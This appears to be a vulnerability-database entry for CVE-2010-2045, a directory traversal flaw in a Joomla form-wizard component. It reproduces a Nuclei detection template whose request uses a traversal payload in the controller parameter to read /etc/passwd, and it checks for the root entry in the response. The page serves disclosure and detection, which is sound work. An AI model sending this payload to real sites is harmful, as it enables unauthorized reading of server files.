CVE-2010-2045: Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion

日期: 2025-08-01 | 影响软件: Joomla! Component FDione Form Wizard | POC: 已公开

漏洞描述

A directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.

PoC代码[已公开]

id: CVE-2010-2045

info:
  name: Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/12595
    - https://nvd.nist.gov/vuln/detail/CVE-2010-2045
    - http://packetstormsecurity.org/1005-exploits/joomlafdione-lfi.txt
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/58574
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2010-2045
    cwe-id: CWE-22
    epss-score: 0.03389
    epss-percentile: 0.86945
    cpe: cpe:2.3:a:dionesoft:com_dioneformwizard:1.0.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dionesoft
    product: com_dioneformwizard
  tags: cve,cve2010,joomla,lfi,edb,packetstorm,dionesoft

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402203a6602ea767928ceb68d4a1116bfdc51a3c09e1a00670060748d01c44feb5615022078d2b42851bd585e24e7cd7c9f22985517584e19d7316a41aa8e75e3be1164e7:922c64590222798bb761d5b6d8e72950

相关漏洞推荐